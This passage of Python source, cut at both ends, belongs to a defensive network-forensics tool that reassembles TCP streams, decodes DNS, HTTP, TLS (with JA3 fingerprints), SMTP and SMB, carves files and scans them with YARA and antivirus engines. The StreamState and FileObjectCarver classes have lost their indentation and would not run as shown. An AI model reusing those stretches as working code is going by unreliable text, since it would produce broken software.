    """Own an asyncio event loop that runs forever on a background daemon thread.

    Submit coroutines from any thread with run_coroutine(). Call stop() to
    shut the loop down, join its thread and close it.
    """

    def __init__(self) -> None:
        self.loop = asyncio.new_event_loop()
        self.thread = threading.Thread(target=self._run_loop, daemon=True)
        self.thread.start()

    def _run_loop(self) -> None:
        asyncio.set_event_loop(self.loop)
        self.loop.run_forever()

    def run_coroutine(self, coro):
        """Schedule *coro* on the background loop; return a concurrent.futures.Future."""
        return asyncio.run_coroutine_threadsafe(coro, self.loop)

    def stop(self, timeout: Optional[float] = 5.0) -> None:
        """Stop the loop, wait up to *timeout* seconds for its thread, then close it.

        Safe to call more than once. It must not be called from the loop's own
        thread, because a thread cannot join itself. The loop is only closed if
        the thread actually exited within the timeout.
        """
        if self.loop.is_closed():
            return
        # Queued even if run_forever() has not started yet; it then stops immediately.
        self.loop.call_soon_threadsafe(self.loop.stop)
        self.thread.join(timeout)
        if not self.thread.is_alive():
            self.loop.close()
class IPLookup:
    """Asynchronous ipinfo.io lookups with a TTL cache of successful answers.

    Requires the optional ``cachetools`` and ``aiohttp`` packages.
    """

    def __init__(self, ttl: int = 3600, cache_size: int = 1000, logger: Optional[logging.Logger] = None) -> None:
        if TTLCache is None or aiohttp is None:
            raise ImportError("IPLookup requires 'cachetools' and 'aiohttp'.")
        self.cache = TTLCache(maxsize=cache_size, ttl=ttl)
        self.logger = logger or logging.getLogger(__name__)

    async def fetch_ip_info(self, session: aiohttp.ClientSession, ip: str) -> Dict[str, Any]:
        """Return ipinfo.io's JSON for *ip* using *session*, or {} on failure.

        Only HTTP 200 responses are cached. Errors are logged, never raised.
        """
        # EAFP: an `in` check followed by `[]` can raise KeyError if the TTL
        # entry expires between the two calls.
        try:
            return self.cache[ip]
        except KeyError:
            pass
        try:
            async with session.get(f"https://ipinfo.io/{ip}/json", timeout=5) as resp:
                if resp.status == 200:
                    data = await resp.json()
                    self.cache[ip] = data
                    return data
                self.logger.warning("IP lookup for %s returned status %s", ip, resp.status)
        except asyncio.TimeoutError:
            # Routine for best-effort enrichment; a traceback adds nothing.
            self.logger.warning("IP lookup for %s timed out", ip)
        except aiohttp.ClientError as e:
            self.logger.exception("Network error during IP lookup for %s: %s", ip, e)
        except Exception:
            self.logger.exception("Unexpected error during IP lookup for %s", ip)
        return {}

    async def get_ip_info(self, ip: str) -> Dict[str, Any]:
        """Look up *ip* with a short-lived ClientSession (see fetch_ip_info)."""
        async with aiohttp.ClientSession() as session:
            return await self.fetch_ip_info(session, ip)
class DNSParser:
    """Minimal DNS wire-format parser that logs the header and question section."""

    def __init__(self, logger: Optional[logging.Logger] = None, blacklist: Optional[List[str]] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.blacklist = set(blacklist or ['ipinfo.io', 'ipinfo.io.'])  # TODO: add wildcard domains

    def is_blacklisted(self, domain: str) -> bool:
        """Exact (case-sensitive) membership test against the blacklist."""
        return domain in self.blacklist

    def parse_dns_name(self, payload: bytes, offset: int) -> Tuple[str, int]:
        """Decode the (possibly compressed) domain name starting at *offset*.

        Returns ``(name, next_offset)``. ``next_offset`` is the position just
        past the name in the original byte stream, i.e. past the first
        compression pointer if one was followed. Labels are decoded as UTF-8
        with replacement.

        Compression pointers must point strictly before the previous jump
        target (initially the name's own start), as real encoders always point
        backwards. This guarantees termination on hostile packets whose
        pointers loop; on such a pointer the name is truncated and a warning
        is logged.
        """
        labels: List[str] = []
        end_offset: Optional[int] = None
        lowest_target = offset
        pos = offset
        while pos < len(payload):
            length = payload[pos]
            if (length & 0xC0) == 0xC0:
                if pos + 1 >= len(payload):
                    break  # truncated pointer
                pointer = ((length & 0x3F) << 8) | payload[pos + 1]
                if end_offset is None:
                    end_offset = pos + 2
                if pointer >= lowest_target:
                    self.logger.warning(
                        "DNS compression pointer %d at offset %d does not point backwards; name truncated.",
                        pointer, pos)
                    break
                lowest_target = pointer
                pos = pointer
                continue
            if length == 0:
                pos += 1
                break
            pos += 1
            labels.append(payload[pos: pos + length].decode('utf-8', errors='replace'))
            pos += length
        return ".".join(labels), (pos if end_offset is None else end_offset)

    def parse_dns_payload(self, payload: bytes) -> None:
        """Log the 12-byte DNS header and each question (name, type, class)."""
        self.logger.info("Parsing DNS payload...")
        if len(payload) < 12:
            self.logger.warning("DNS payload too short to parse.")
            return
        try:
            transaction_id, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
            # %#06x renders 16-bit fields as 0x + 4 hex digits (e.g. 0x0100).
            self.logger.info("DNS Header: ID=%#06x, Flags=%#06x, QD=%d, AN=%d, NS=%d, AR=%d",
                             transaction_id, flags, qdcount, ancount, nscount, arcount)
        except Exception as e:
            self.logger.exception("Error parsing DNS header: %s", e)
            return
        offset = 12
        for i in range(qdcount):
            try:
                domain, offset = self.parse_dns_name(payload, offset)
                if offset + 4 > len(payload):
                    self.logger.warning("DNS question truncated.")
                    break
                qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
                offset += 4
                self.logger.info("DNS Question %d: %s, type: %d, class: %d", i + 1, domain, qtype, qclass)
            except Exception as e:
                self.logger.exception("Error parsing DNS question: %s", e)
                break
class PayloadParser:
    """Helpers that log, normalize and fingerprint raw packet payloads."""

    def __init__(self, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        # Magic-number table: upper-case hex signature -> description.
        self.SIGNATURES = {
            "504B0304": "ZIP archive / Office Open XML document (DOCX, XLSX, PPTX)",
            "504B030414000600": "Office Open XML (DOCX, XLSX, PPTX) extended header",
            "1F8B08": "GZIP archive",
            "377ABCAF271C": "7-Zip archive",
            "52617221": "RAR archive",
            "425A68": "BZIP2 archive",
            "213C617263683E0A": "Ar (UNIX archive) / Debian package",
            "7F454C46": "ELF executable (Unix/Linux)",
            "4D5A": "Windows executable (EXE, MZ header / DLL)",
            "CAFEBABE": "Java class file or Mach-O Fat Binary (ambiguous)",
            "FEEDFACE": "Mach-O executable (32-bit, little-endian)",
            "CEFAEDFE": "Mach-O executable (32-bit, big-endian)",
            "FEEDFACF": "Mach-O executable (64-bit, little-endian)",
            "CFFAEDFE": "Mach-O executable (64-bit, big-endian)",
            "BEBAFECA": "Mach-O Fat Binary (little endian)",
            "4C000000": "Windows shortcut file (.lnk)",
            "4D534346": "Microsoft Cabinet file (CAB)",
            "D0CF11E0": "Microsoft Office legacy format (DOC, XLS, PPT)",
            "25504446": "PDF document",
            "7B5C727466": "RTF document (starting with '{\\rtf')",
            "3C3F786D6C": "XML file (<?xml)",
            "3C68746D6C3E": "HTML file",
            "252150532D41646F6265": "PostScript/EPS document (starts with '%!PS-Adobe')",
            "4D2D2D2D": "PostScript file (---)",
            "89504E47": "PNG image",
            "47494638": "GIF image",
            "FFD8FF": "JPEG image (general)",
            "FFD8FFE0": "JPEG image (JFIF)",
            "FFD8FFE1": "JPEG image (EXIF)",
            "424D": "Bitmap image (BMP)",
            "49492A00": "TIFF image (little endian / Intel)",
            "4D4D002A": "TIFF image (big endian / Motorola)",
            "38425053": "Adobe Photoshop document (PSD)",
            "00000100": "ICO icon file",
            "00000200": "CUR cursor file",
            "494433": "MP3 audio (ID3 tag)",
            "000001BA": "MPEG video (VCD)",
            "000001B3": "MPEG video",
            "66747970": "MP4/MOV file (ftyp)",
            "4D546864": "MIDI file",
            "464F524D": "AIFF audio file",
            "52494646": "AVI file (RIFF) [Also used in WAV]",
            "664C6143": "FLAC audio file",
            "4F676753": "OGG container file (OggS)",
            "53514C69": "SQLite database file (SQLite format 3)",
            "420D0D0A": "Python compiled file (.pyc) [example magic, may vary]",
            "6465780A": "Android Dalvik Executable (DEX) file",
            "EDABEEDB": "RPM package file",
            "786172210D0A1A0A": "XAR archive (macOS installer package)",
        }

    def normalize_payload(self, payload: bytes) -> str:
        """Return *payload* as log-friendly text, or as hex if it looks binary.

        The bytes are decoded as UTF-8 with invalid sequences replaced, and every
        character outside ``string.printable`` becomes '.'. If more than half of
        the characters had to be substituted, ``payload.hex()`` is returned
        instead. Only substituted characters count toward that threshold, so
        literal dots in genuine text do not push it into hex.
        """
        try:
            text = payload.decode('utf-8', errors='replace')
        except Exception:
            return payload.hex()
        printable = set(string.printable)
        substituted = 0
        chars = []
        for ch in text:
            if ch in printable:
                chars.append(ch)
            else:
                chars.append('.')
                substituted += 1
        if substituted > len(chars) * 0.5:
            return payload.hex()
        return ''.join(chars)

    def parse_http_payload(self, payload: bytes) -> None:
        try:
            text = payload.decode('utf-8', errors='replace')
            text = self._make_log_safe(text)
            self.logger.info("HTTP Payload:\n%s", text)
        except Exception as e:
            self.logger.exception("Error parsing HTTP payload: %s", e)

    def parse_text_payload(self, payload: bytes) -> None:
        try:
            text = payload.decode('utf-8', errors='replace')
            text = self._make_log_safe(text)
            self.logger.info("Text Payload:\n%s", text)
        except Exception as e:
            self.logger.exception("Error decoding text payload: %s", e)

    def parse_tls_payload(self, payload: bytes) -> None:
        self.logger.info("TLS Payload (hex):\n%s", payload.hex())

    def analyze_hex_dump(self, payload: bytes) -> List[Tuple[str, str]]:
        """Return ``(hex_signature, description)`` for each known magic in *payload*.

        Signatures of at most 4 bytes (8 hex digits) count only at offset 0,
        presumably because they are too short to search for anywhere. Longer
        signatures match anywhere. Matching is done on the raw bytes, so every
        hit is byte-aligned; searching the hex string could match across a
        nibble boundary. Each hit is also logged at WARNING level.
        """
        data = bytes(payload)
        self.logger.info("Analyzing payload hex dump for signatures...")
        found = []
        for sig, desc in self.SIGNATURES.items():
            needle = bytes.fromhex(sig)
            if len(sig) <= 8:
                matched = data.startswith(needle)
            else:
                matched = needle in data
            if matched:
                found.append((sig, desc))
                self.logger.warning("Detected signature %s: %s", sig, desc)
        return found

    def _make_log_safe(self, text: str) -> str:
        """Round-trip *text* through stdout's encoding, replacing unencodable characters."""
        target_encoding = getattr(sys.stdout, "encoding", None) or "utf-8"
        return text.encode(target_encoding, errors="replace").decode(target_encoding, errors="replace")
@dataclass(frozen=True)
class FlowKey:
    """Hashable flow identifier (frozen dataclass) used as the stream-table key.

    canonical_flow_key() orders the endpoints so that both directions of a
    connection produce the same key.
    """
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str  # protocol tag; canonical_flow_key() defaults it to "TCP"
def canonical_flow_key(src_ip: str, src_port: int, dst_ip: str, dst_port: int, proto: str = "TCP") -> Tuple[FlowKey, bool]:
    """Build a direction-independent FlowKey for a packet.

    The (ip, port) endpoint that sorts lower (plain tuple/string comparison)
    becomes the key's source. The returned flag is True when the packet's own
    source is that lower endpoint, i.e. it travels in the key's forward direction.
    """
    forward = (src_ip, src_port) <= (dst_ip, dst_port)
    if not forward:
        return FlowKey(dst_ip, dst_port, src_ip, src_port, proto), False
    return FlowKey(src_ip, src_port, dst_ip, dst_port, proto), True
@dataclass
class StreamDirectionState:
    """Reassembly buffer for one direction of a TCP stream.

    Fields:
        base_seq: sequence number of the first payload byte seen.
        next_seq: sequence number expected next (the end of ``contiguous``).
        contiguous: in-order payload bytes reassembled so far.
        out_of_order: segments received ahead of ``next_seq``, keyed by start seq.

    After the first segment, sequence numbers live in an unwrapped (unbounded)
    space. Each incoming 32-bit ``seq`` is mapped to the congruent value
    nearest ``next_seq``, so a stream that crosses the 2**32 wrap-around keeps
    reassembling. For streams that never wrap, values equal the raw numbers.
    """

    base_seq: Optional[int] = None
    next_seq: Optional[int] = None
    contiguous: bytearray = field(default_factory=bytearray)
    out_of_order: Dict[int, bytes] = field(default_factory=dict)

    # Unannotated, so not a dataclass field: TCP sequence-number modulus.
    _SEQ_MOD = 1 << 32

    def add(self, seq: int, payload: bytes) -> int:
        """Add a segment starting at *seq*; return how many bytes became contiguous.

        Already-reassembled bytes (retransmissions/overlaps) are trimmed. A
        segment ahead of ``next_seq`` is buffered (keeping the longest copy per
        start sequence) and 0 is returned. An in-order segment is appended
        together with every buffered segment it makes contiguous, including
        buffered segments that overlap it.
        """
        if not payload:
            return 0
        if self.base_seq is None:
            self.base_seq = seq
            self.next_seq = seq
        elif self.next_seq is None:
            self.next_seq = seq
        else:
            seq = self._unwrap(seq)
        if seq < self.next_seq:
            overlap = self.next_seq - seq
            if overlap >= len(payload):
                return 0  # pure retransmission
            payload = payload[overlap:]
            seq = self.next_seq
        if seq > self.next_seq:
            existing = self.out_of_order.get(seq)
            if existing is None or len(payload) > len(existing):
                self.out_of_order[seq] = payload
            return 0
        self.contiguous.extend(payload)
        self.next_seq += len(payload)
        return len(payload) + self._drain()

    def _unwrap(self, seq: int) -> int:
        """Return the value congruent to *seq* (mod 2**32) closest to ``next_seq``."""
        delta = (seq - self.next_seq) % self._SEQ_MOD
        if delta >= self._SEQ_MOD // 2:
            delta -= self._SEQ_MOD
        return self.next_seq + delta

    def _drain(self) -> int:
        """Move buffered segments that now reach ``next_seq`` into ``contiguous``.

        Exact continuations are taken first. Segments that start before
        ``next_seq`` are trimmed to their new bytes, or dropped if fully
        covered. Returns the number of bytes appended.
        """
        appended = 0
        while self.out_of_order:
            chunk = self.out_of_order.pop(self.next_seq, None)
            if chunk is not None:
                self.contiguous.extend(chunk)
                appended += len(chunk)
                self.next_seq += len(chunk)
                continue
            stale = sorted(s for s in self.out_of_order if s < self.next_seq)
            if not stale:
                break
            for start in stale:
                chunk = self.out_of_order.pop(start)
                end = start + len(chunk)
                if end > self.next_seq:
                    piece = chunk[self.next_seq - start:]
                    self.contiguous.extend(piece)
                    appended += len(piece)
                    self.next_seq = end
        return appended
@dataclass
# Both halves of one TCP conversation plus bookkeeping timestamps.
# NOTE: which half counts as "client_to_server" comes from canonical_flow_key's
# endpoint ordering (a lexical comparison of (ip, port)), not from which side
# opened the connection.
class StreamState:
client_to_server: StreamDirectionState = field(default_factory=StreamDirectionState)
server_to_client: StreamDirectionState = field(default_factory=StreamDirectionState)
created_at: float = field(default_factory=time.time)  # wall-clock creation time (time.time())
last_seen: float = field(default_factory=time.time)  # refreshed by TCPStreamReassembler per segment; drives TTL/size eviction
class TCPStreamReassembler:
    """Track TCP conversations and reassemble each direction in sequence order.

    Streams are keyed by the direction-independent FlowKey from
    canonical_flow_key(), so both halves of a conversation share one
    StreamState. Streams idle for more than ``stream_ttl`` seconds are
    expired. Once more than ``max_streams`` are tracked, the least recently
    seen streams are dropped.

    NOTE(review): add_tcp_segment() returns full copies of both direction
    buffers, which grow without bound; callers that only need a tail pay
    O(stream size) per segment.
    """

    def __init__(self, logger: Optional[logging.Logger] = None, max_streams: int = 10000, stream_ttl: int = 1800) -> None:
        from collections import OrderedDict

        self.logger = logger or logging.getLogger(__name__)
        self.max_streams = max_streams
        self.stream_ttl = stream_ttl
        # Kept least-recently-seen first: add_tcp_segment() re-inserts the
        # active flow at the end. Eviction therefore only inspects the front
        # instead of scanning/sorting every stream on every packet.
        self.streams: Dict[FlowKey, StreamState] = OrderedDict()

    def _evict_old(self) -> None:
        """Drop idle streams, then the oldest ones beyond ``max_streams``.

        Amortised O(number evicted). The stale scan stops at the first stream
        still within the TTL, relying on the last-seen ordering of ``streams``.
        """
        now = time.time()
        streams = self.streams
        while streams:
            oldest_key = next(iter(streams))
            if now - streams[oldest_key].last_seen <= self.stream_ttl:
                break
            del streams[oldest_key]
        while streams and len(streams) > self.max_streams:
            del streams[next(iter(streams))]

    def add_tcp_segment(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int, seq: int, payload: bytes) -> Dict[str, Any]:
        """Add one segment to its flow and report the flow's current state.

        Returns:
            dict with ``flow_key``, ``is_client_to_server`` (the direction
            flag from canonical_flow_key), ``bytes_added`` (newly contiguous
            bytes) and copies of both reassembled byte streams.
        """
        key, forward_is_client = canonical_flow_key(src_ip, src_port, dst_ip, dst_port)
        stream = self.streams.pop(key, None)
        if stream is None:
            stream = StreamState()
        # Re-insert at the end so the table stays ordered by last activity.
        self.streams[key] = stream
        stream.last_seen = time.time()
        state = stream.client_to_server if forward_is_client else stream.server_to_client
        added = state.add(seq, payload)
        self._evict_old()
        return {
            "flow_key": key,
            "is_client_to_server": forward_is_client,
            "bytes_added": added,
            "client_stream": bytes(stream.client_to_server.contiguous),
            "server_stream": bytes(stream.server_to_client.contiguous),
        }
class ProtocolDecoder:
    """Best-effort application-protocol decoders for reassembled payloads.

    Every ``decode_*`` helper returns a plain dict whose ``"protocol"`` key
    names the decoder. Short or malformed input yields an ``"error"`` record
    (DNS/SMB) or an empty/``"unknown"`` result rather than an exception.
    """

    def __init__(self, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)

    @staticmethod
    def _is_grease(value: int) -> bool:
        """True for RFC 8701 GREASE code points (0x0A0A, 0x1A1A, ..., 0xFAFA)."""
        return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)

    def decode_http(self, payload: bytes, direction: str) -> Dict[str, Any]:
        """Split an HTTP/1.x message into start line, lower-cased headers and body.

        ISO-8859-1 maps every byte to one character, so ``body_bytes`` is the
        original body bytes after the blank line.
        """
        text = payload.decode("iso-8859-1", errors="replace")
        head, _, body = text.partition("\r\n\r\n")
        lines = head.split("\r\n") if head else []
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip().lower()] = v.strip()
        return {
            "protocol": "http1",
            "direction": direction,
            "start_line": lines[0] if lines else "",
            "headers": headers,
            "body_bytes": body.encode("iso-8859-1", errors="ignore"),
            "host": headers.get("host", ""),
            "content_type": headers.get("content-type", ""),
            "transfer_encoding": headers.get("transfer-encoding", "").lower(),
            "content_encoding": headers.get("content-encoding", "").lower(),
        }

    def decode_dns(self, payload: bytes) -> Dict[str, Any]:
        """Decode the 12-byte DNS header and, if present, the first question name.

        The header is read from offset 0.
        NOTE(review): DNS over TCP prefixes each message with a 2-byte length
        (RFC 1035 4.2.2); TCP callers should strip it first -- confirm.
        """
        if len(payload) < 12:
            return {"protocol": "dns", "error": "short_payload"}
        tid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
        qr = (flags >> 15) & 0x1
        opcode = (flags >> 11) & 0xF
        rcode = flags & 0xF
        query_name = ""
        if qdcount > 0:
            try:
                query_name, _ = DNSParser(logger=self.logger).parse_dns_name(payload, 12)
            except Exception:
                query_name = ""
        return {
            "protocol": "dns",
            "transaction_id": tid,
            "is_response": bool(qr),
            "opcode": opcode,
            "rcode": rcode,
            "qdcount": qdcount,
            "ancount": ancount,
            "nscount": nscount,
            "arcount": arcount,
            "query": query_name,
        }

    def _parse_tls_client_hello(self, payload: bytes) -> Dict[str, Any]:
        """Extract SNI and a JA3 fingerprint from a TLS ClientHello.

        Returns {} unless *payload* starts with a handshake record (0x16)
        whose first message is a ClientHello (0x01). The JA3 string follows
        the reference implementation. Its fields, in order, are:

        - the ClientHello version;
        - cipher suites;
        - extension types;
        - supported groups;
        - EC point formats.

        GREASE values (RFC 8701) are removed so GREASE-using clients keep a
        stable hash.
        """
        if len(payload) < 5 or payload[0] != 0x16:
            return {}
        rec_len = int.from_bytes(payload[3:5], "big")
        rec = payload[5:5 + rec_len]
        if len(rec) < 4 or rec[0] != 0x01:
            return {}
        hs_len = int.from_bytes(rec[1:4], "big")
        body = rec[4:4 + hs_len]
        # client_version (2 bytes) + random (32 bytes) must be present.
        if len(body) < 34:
            return {}
        client_version = int.from_bytes(body[0:2], "big")
        idx = 34
        if idx >= len(body):
            return {}
        sess_len = body[idx]
        idx += 1 + sess_len
        if idx + 2 > len(body):
            return {}
        ciphers_len = int.from_bytes(body[idx:idx + 2], "big")
        idx += 2
        ciphers_raw = body[idx:idx + ciphers_len]
        idx += ciphers_len
        if idx >= len(body):
            return {}
        comp_len = body[idx]
        idx += 1 + comp_len
        exts: List[int] = []
        curves: List[int] = []
        ec_pf: List[int] = []
        sni = ""
        if idx + 2 <= len(body):
            ext_total = int.from_bytes(body[idx:idx + 2], "big")
            idx += 2
            end = min(len(body), idx + ext_total)
            while idx + 4 <= end:
                etype = int.from_bytes(body[idx:idx + 2], "big")
                elen = int.from_bytes(body[idx + 2:idx + 4], "big")
                idx += 4
                ext_data = body[idx:idx + elen]
                idx += elen
                if not self._is_grease(etype):
                    exts.append(etype)
                if etype == 0 and len(ext_data) >= 5:
                    # server_name: list length, name type (0 = host_name), name length, name.
                    list_len = int.from_bytes(ext_data[0:2], "big")
                    if 2 + list_len <= len(ext_data) and ext_data[2] == 0:
                        name_len = int.from_bytes(ext_data[3:5], "big")
                        if 5 + name_len <= len(ext_data):
                            sni = ext_data[5:5 + name_len].decode("utf-8", errors="replace")
                elif etype == 10 and len(ext_data) >= 2:
                    # supported_groups (formerly elliptic_curves): 2-byte entries.
                    glen = int.from_bytes(ext_data[0:2], "big")
                    data = ext_data[2:2 + glen]
                    curves = [
                        group
                        for group in (int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data) - 1, 2))
                        if not self._is_grease(group)
                    ]
                elif etype == 11 and len(ext_data) >= 1:
                    # ec_point_formats: 1-byte entries.
                    flen = ext_data[0]
                    ec_pf = list(ext_data[1:1 + flen])
        ciphers = [
            suite
            for suite in (int.from_bytes(ciphers_raw[i:i + 2], "big") for i in range(0, len(ciphers_raw) - 1, 2))
            if not self._is_grease(suite)
        ]
        ja3_string = ",".join([
            str(client_version),
            "-".join(str(c) for c in ciphers),
            "-".join(str(e) for e in exts),
            "-".join(str(c) for c in curves),
            "-".join(str(p) for p in ec_pf),
        ])
        ja3_hash = hashlib.md5(ja3_string.encode("utf-8", errors="ignore")).hexdigest()
        return {
            "protocol": "tls",
            "record_type": "handshake",
            "sni": sni,
            "ja3": ja3_string,
            "ja3_hash": ja3_hash,
        }

    def decode_smtp(self, payload: bytes) -> Dict[str, Any]:
        """List the first word (upper-cased) of up to 25 non-blank SMTP lines."""
        text = payload.decode("utf-8", errors="replace")
        lines = [line.strip() for line in text.splitlines() if line.strip()]
        commands = [line.split(" ", 1)[0].upper() for line in lines[:25]]
        return {"protocol": "smb" if False else "smtp", "commands": commands, "line_count": len(lines)}

    def decode_smb(self, payload: bytes) -> Dict[str, Any]:
        """Recognise SMB1 (\\xffSMB) / SMB2+ (\\xfeSMB) headers and report byte 4."""
        if len(payload) >= 4 and payload[:4] in (b"\xfeSMB", b"\xffSMB"):
            return {"protocol": "smb", "signature": payload[:4].hex(), "command": payload[4] if len(payload) > 4 else None}
        return {"protocol": "smb", "error": "not_smb"}

    def decode_by_ports_or_signature(self, src_port: int, dst_port: int, payload: bytes, direction: str) -> Dict[str, Any]:
        """Pick a decoder from well-known ports or leading bytes, checked in order:

        DNS (53), HTTP (methods/status line or 80/8080), TLS (0x16 or 443),
        SMTP (25 or command verbs), SMB (445 or header magic).
        """
        ports = {src_port, dst_port}
        if not payload:
            return {"protocol": "unknown"}
        if 53 in ports:
            return self.decode_dns(payload)
        if payload.startswith((b"GET ", b"POST ", b"PUT ", b"DELETE ", b"HEAD ", b"OPTIONS ", b"HTTP/1.")) or 80 in ports or 8080 in ports:
            return self.decode_http(payload, direction)
        if payload[:1] == b"\x16" or 443 in ports:
            tls_data = self._parse_tls_client_hello(payload)
            return tls_data if tls_data else {"protocol": "tls", "record_type": "unknown"}
        if 25 in ports or payload[:5].upper() in (b"HELO ", b"EHLO ", b"MAIL ", b"RCPT ", b"DATA\r"):
            return self.decode_smtp(payload)
        if 445 in ports or payload.startswith((b"\xfeSMB", b"\xffSMB")):
            return self.decode_smb(payload)
        return {"protocol": "unknown"}
class ContentDecoder:
    """Undo HTTP transfer/content encodings and sniff common file containers."""

    # RFC 9112 chunk-size is 1*HEXDIG. int(x, 16) alone also accepts a sign,
    # underscores and "0x"; a negative size walked the cursor backwards forever.
    _CHUNK_SIZE_RE = re.compile(rb"[0-9A-Fa-f]+")
    # Default cap on decompressed output (guards against decompression bombs).
    DEFAULT_MAX_DECOMPRESSED = 64 * 1024 * 1024

    def __init__(self, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)

    def decode_chunked(self, body: bytes) -> bytes:
        """Join the data of an HTTP/1.1 chunked body (chunk extensions ignored).

        Stops at the terminating zero-size chunk, at a malformed size line, or
        when the data runs out; a truncated final chunk is kept partially.
        """
        out = bytearray()
        idx = 0
        while idx < len(body):
            end = body.find(b"\r\n", idx)
            if end == -1:
                break
            size_line = body[idx:end].split(b";", 1)[0].strip()
            if not self._CHUNK_SIZE_RE.fullmatch(size_line):
                break
            size = int(size_line, 16)
            idx = end + 2
            if size == 0:
                break
            out.extend(body[idx:idx + size])
            idx += size + 2  # skip chunk data and its trailing CRLF
        return bytes(out)

    def _inflate(self, data: bytes, wbits: int, limit: int) -> bytes:
        """Decompress *data* with zlib *wbits*, keeping partial output.

        At most *limit* (> 0) bytes are produced. Output from a truncated
        stream is returned rather than discarded. Further concatenated members
        (multi-member gzip) are decoded in turn; undecodable trailing bytes
        after a complete member are ignored.

        Raises:
            zlib.error: if the first member is not valid for *wbits*.
        """
        out = bytearray()
        first = True
        while data and len(out) < limit:
            inflater = zlib.decompressobj(wbits)
            try:
                out += inflater.decompress(data, limit - len(out))
            except zlib.error:
                if first:
                    raise
                break
            first = False
            if not inflater.eof:
                break  # truncated input, or the output cap was reached
            data = inflater.unused_data
        return bytes(out)

    def decode_http_content(self, decoded_http: Dict[str, Any], max_output_bytes: int = DEFAULT_MAX_DECOMPRESSED) -> bytes:
        """Return the HTTP body from ``decode_http`` with encodings removed.

        Chunked transfer coding is removed first. Then a gzip or deflate
        content coding is inflated; "deflate" is tried as zlib-wrapped and then
        as raw DEFLATE, since servers send both. Output is capped at
        *max_output_bytes* (must be > 0). If inflation fails, the
        (de-chunked) body is returned unchanged.
        """
        body = decoded_http.get("body_bytes", b"")
        if decoded_http.get("transfer_encoding") == "chunked":
            body = self.decode_chunked(body)
        content_encoding = decoded_http.get("content_encoding") or ""
        if "gzip" in content_encoding:
            attempts = (16 + zlib.MAX_WBITS,)
        elif "deflate" in content_encoding:
            attempts = (zlib.MAX_WBITS, -zlib.MAX_WBITS)
        else:
            return body
        for wbits in attempts:
            try:
                return self._inflate(body, wbits, max_output_bytes)
            except (zlib.error, ValueError, TypeError) as exc:
                self.logger.debug("Content decoding failed: %s", exc)
        return body

    def try_base64(self, payload: bytes) -> bytes:
        """Decode *payload* as base64 if it looks like it (>= 16 chars after
        removing whitespace, base64 alphabet only); otherwise return b""."""
        cleaned = b"".join(payload.split())
        if len(cleaned) < 16:
            return b""
        if not re.fullmatch(rb"[A-Za-z0-9+/=]+", cleaned):
            return b""
        try:
            return binascii.a2b_base64(cleaned)
        except Exception:
            return b""

    def detect_container(self, payload: bytes) -> str:
        """Classify *payload* by magic bytes: zip, pdf, pe, ole or unknown."""
        if payload.startswith(b"PK\x03\x04"):
            return "zip"
        if payload.startswith(b"%PDF-"):
            return "pdf"
        if payload.startswith(b"MZ"):
            return "pe"
        if payload.startswith(bytes.fromhex("D0CF11E0A1B11AE1")):
            return "ole"
        return "unknown"
class FileObjectCarver:
def __init__(self, logger: Optional[logging.Logger] = None, output_dir: str = "carved_objects") -> None:
self.logger = logger or logging.getLogger(__name__)
self.output_dir = output_dir
os.makedirs(self.output_dir, exist_ok=True)
def carve(self, flow_key: FlowKey, payload: bytes, source: str) -> Optional[Dict[str, Any]]:
container = ContentDecoder(logger=self.logger).detect_container(payload)
if container == "unknown" or len(payload) < 64:
return None
timestamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%S%f")
filename = f"{flow_key.src_ip}_{flow_key.src_port}_{flow_key.dst_ip}_{flow_key.dst_port}_{source}_{timestamp}.{container}"
safe_name = re.sub(r"[^A-Za-z0-9_.-]", "_", filename)
path = os.path.join(self.output_dir, safe_name)
with open(path, "wb") as f:
f.write(payload)
sha256 = hashlib.sha256(payload).hexdigest()
return {"path": path, "sha256": sha256, "container": container, "size": len(payload)}
class SignatureScanner:
    """YARA matching for byte buffers and files, plus an optional AV pass.

    YARA rules are compiled only when the yara module is importable and
    *yara_rules_path* exists; otherwise every YARA scan returns no hits.
    """

    def __init__(self, logger: Optional[logging.Logger] = None, yara_rules_path: str = "") -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.yara_rules_path = yara_rules_path
        self.yara_rules = None
        can_load = yara is not None and yara_rules_path and os.path.exists(yara_rules_path)
        if not can_load:
            return
        try:
            self.yara_rules = yara.compile(filepath=yara_rules_path)
            self.logger.info("YARA rules loaded: %s", yara_rules_path)
        except Exception as exc:
            self.logger.warning("Failed to load YARA rules: %s", exc)

    def scan_bytes(self, payload: bytes) -> List[str]:
        """Return the names of YARA rules matching *payload* ([] on any failure)."""
        rules = self.yara_rules
        if rules is None:
            return []
        try:
            return [hit.rule for hit in rules.match(data=payload)]
        except Exception as exc:
            self.logger.debug("YARA byte scan failed: %s", exc)
            return []

    @staticmethod
    def _av_command(path: str) -> Optional[List[str]]:
        """Build an on-demand AV scan command: ClamAV first, then Defender's MpCmdRun."""
        if shutil.which("clamscan"):
            return ["clamscan", "--no-summary", path]
        if shutil.which("MpCmdRun.exe"):
            return ["MpCmdRun.exe", "-Scan", "-ScanType", "3", "-File", path]
        return None

    def scan_file(self, path: str) -> Dict[str, Any]:
        """Scan a file on disk with YARA and, if one is on PATH, an AV engine.

        Returns:
            ``{"yara": [rule names], "av": text}``. ``av`` is "not_run" when no
            scanner was found, the first 1000 chars of the scanner's combined
            output, or "scan_failed: ..." if it could not be run (30 s timeout).
        """
        result = {"yara": [], "av": "not_run"}
        if self.yara_rules is not None:
            try:
                result["yara"] = [hit.rule for hit in self.yara_rules.match(path)]
            except Exception as exc:
                self.logger.debug("YARA file scan failed for %s: %s", path, exc)
        av_cmd = self._av_command(path)
        if av_cmd:
            try:
